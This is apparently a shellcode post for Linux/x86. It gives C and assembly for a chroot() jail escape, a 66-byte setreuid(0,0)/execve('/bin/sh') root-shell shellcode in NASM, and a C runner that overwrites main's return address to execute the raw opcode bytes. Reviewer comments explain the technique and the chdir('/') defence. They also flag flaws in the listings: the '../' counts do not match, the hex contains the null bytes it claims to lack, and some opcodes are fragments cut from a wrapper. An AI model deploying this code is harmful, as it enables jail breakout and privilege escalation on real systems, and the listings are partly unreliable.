출처: Okti
장르: 셸코드
Linux/x86 chroot and standard shellcode
Linux/x86 chroot and standard shellcode.


----------------------------------------------------------------------------------------------

/* Mkdir and Chroot are written in C: */

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/stat.h>
/*
 * Classic chroot() escape in four steps: create a directory, make it
 * root-owned and 0600, chroot() into it WITHOUT chdir(), then chroot()
 * again with a long "../" path so the process root climbs back to the
 * real filesystem root.
 * No return value is checked, so any failure is silent; on Linux chroot()
 * needs CAP_SYS_CHROOT, so this does nothing useful for an unprivileged user.
 * Defence for code that uses chroot(): chdir("/") immediately after
 * chroot() and drop privileges, so a later chroot() cannot climb out.
 */
int main(void) {

      mkdir("sh", 0);                          /* mode 0: no permission bits requested */
      chown("sh", 0, 0);                       /* owner root, group root */
      chmod("sh", S_IRUSR | S_IWUSR);          /* 0600 (decimal 384, see the asm listing) */
      chroot("sh");                            /* root changes, cwd does not -> cwd is now outside the root */
/* As many "../" as possible: each segment walks the root one level up towards the real root
   (the original author left this uncommented) */
      chroot("../../../../../../../../../../../../../../../../../../../../../../../../");
}

----------------------------------------------------------------------------------------------

Asm version of the above C code:

----------------------------------------------------------------------------------------------

# GCC 3.4 (i386, AT&T syntax, cdecl) output for the C program above:
# main() calls mkdir / chown / chmod / chroot / chroot with stack arguments.
.file "y.c"
.section .rodata
# .LC0: the directory name passed to every call
.LC0:
.string "sh"
.align 4
# .LC1: the climb-out path for the second chroot()
# NOTE(review): this has fewer "../" segments than the C listing above (20 vs 24 by my count) -- confirm which was intended
.LC1:
.string "../../../../../../../../../../../../../../../../../../../../"
.text
.globl main
.type main, @function
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
andl $-16, %esp                         # 16-byte align esp (GCC 3.4 main() prologue idiom)
movl $0, %eax                           # eax = ((0 + 15 + 15) >> 4) << 4 = 16 ...
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp                         # ... and reserve that many bytes
subl $8, %esp                           # padding so args + padding = 16 bytes per call
pushl $0                                # mode = 0
pushl $.LC0                             # path = "sh"
call mkdir                              # mkdir("sh", 0)
addl $16, %esp                          # drop args and padding
subl $4, %esp
pushl $0                                # group = 0
pushl $0                                # owner = 0
pushl $.LC0
call chown                              # chown("sh", 0, 0)
addl $16, %esp
subl $8, %esp
pushl $384                              # 384 = 0600 = S_IRUSR | S_IWUSR
pushl $.LC0
call chmod                              # chmod("sh", 0600)
addl $16, %esp
subl $12, %esp
pushl $.LC0
call chroot                             # chroot("sh") -- no chdir(), cwd stays outside the new root
addl $16, %esp
subl $12, %esp
pushl $.LC1
call chroot                             # chroot("../../...") -- climbs back to the real root
addl $16, %esp
leave                                   # esp = ebp; pop ebp (undoes the alignment too)
ret                                     # no return statement in the C: eax is whatever chroot() returned
.size main, .-main
# empty flag string: this object asks for a NON-executable stack
.section .note.GNU-stack,"",@progbits
.ident "GCC: (GNU) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk)"

------------------------------------------------------------------------------------------------

Standard setreuid and execve shellcode (66 bytes).
It is all clean and tidy, uses 'pop' and 'push' to get the string '/bin/sh' from the data segment,
and has no null bytes.
For details, compile this asm code with: nasm -f elf shell.asm then ld shell.o and ./a.out

------------------------------------------------------------------------------------------------

; i386 Linux shellcode (NASM): setreuid(0, 0) followed by execve("/bin/sh", argv, envp).
; Everything -- the code and the string it patches -- is placed in section .data,
; which is writable: the code writes a NUL terminator and an argv array into the
; bytes right after '/bin/sh'. NOTE(review): this presumably relies on .data being
; mapped executable (old, pre-W^X loader behaviour) -- confirm on the target.
section .data

db '/bin/sh'            ; unlabelled copy; nothing references it (the code uses the copy after 'two')
global _start

_start:

; setreuid(uid_t ruid, uid_t euid)  -- i386 syscall 70, ruid = euid = 0

xor eax, eax
mov al, 70              ; __NR_setreuid
xor ebx, ebx            ; ruid = 0
xor ecx, ecx            ; euid = 0
int 0x80

jmp two                 ; jmp / call / pop: 'call one' pushes the address of the '/bin/sh' below
one:
pop ebx                 ; ebx = address of '/bin/sh' (the return address pushed by 'call one')

; execve(const char *filename, char *const argv[], char *const envp[])

xor eax, eax
mov [ebx+7], al         ; NUL-terminate "/bin/sh" in place
mov [ebx+8], ebx        ; argv[0] = "/bin/sh"
mov [ebx+12], eax       ; argv[1] = NULL; the same zero dword doubles as the empty envp array
mov al, 11              ; __NR_execve
lea ecx, [ebx+8]        ; argv
lea edx, [ebx+12]       ; envp
int 0x80

two:
call one                ; pushes the address of the string below, then jumps back to 'one'
db '/bin/sh'            ; patched at run time: NUL, argv[0], NULL are written right after it

---------------------------------------------------------------------------------------------------

Hex opcodes of the mkdir/chroot calls and of the shellcode above, embedded in a C program.

---------------------------------------------------------------------------------------------------

#include<stdio.h>
#include<stdlib.h>
/*
 * Runner for the raw opcodes: places them in a stack buffer and overwrites
 * main()'s saved return address with the buffer's address, so the bytes run
 * when main() returns.
 * Assumptions, none of which hold on a modern build: a 32-bit target (the
 * pointer is truncated through 'int'), a specific frame layout (the saved
 * return address sits 4 ints above 'ret' -- compiler-specific, TODO confirm),
 * an executable stack and no stack protector. A non-executable stack or a
 * canary would be expected to abort this instead of running it, which is
 * exactly what those mitigations are for.
 */
int main() {

      int *ret;                  /* never read: only its address is used as a stack anchor */
      long offset = 4;           /* distance, in ints, from &ret to the saved return address */
      char star[] =
      /* mov edx,ebx; mov ecx,[esp+8]; mov ebx,[esp+4]; mov eax,39 (mkdir); int 0x80
         -- reads its arguments from the stack, i.e. apparently cut from a compiled wrapper,
         not self-contained */
      "\x89\xda\x8b\x4c\x24\x08\x8b\x5c\x24\x04\xb8\x27\x00\x00\x00\xcd\x80"
      /* same shape for chroot (eax = 61), argument taken from [esp+4] */
      "\x89\xda\x8b\x5c\x24\x04\xb8\x3d\x00\x00\x00\xcd\x80"
      /* "/bin/sh" followed by the setreuid/execve shellcode from the NASM listing above;
         the 32-bit immediate and jump encodings here do contain 0x00 bytes */
      "\x2f\x62\x69\x6e\x2f\x73\x68\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd"
      "\x80\xe9\x16\x00\x00\x00\x5b\x31\xc0\x88\x43\x07\x89\x58\x08\x89"
      "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff"
      "\xff\x2f\x62\x69\x6e\x2f\x73\x68";

      *((int * ) &ret + offset) = (int) star;   /* clobber the saved return address with &star */
}

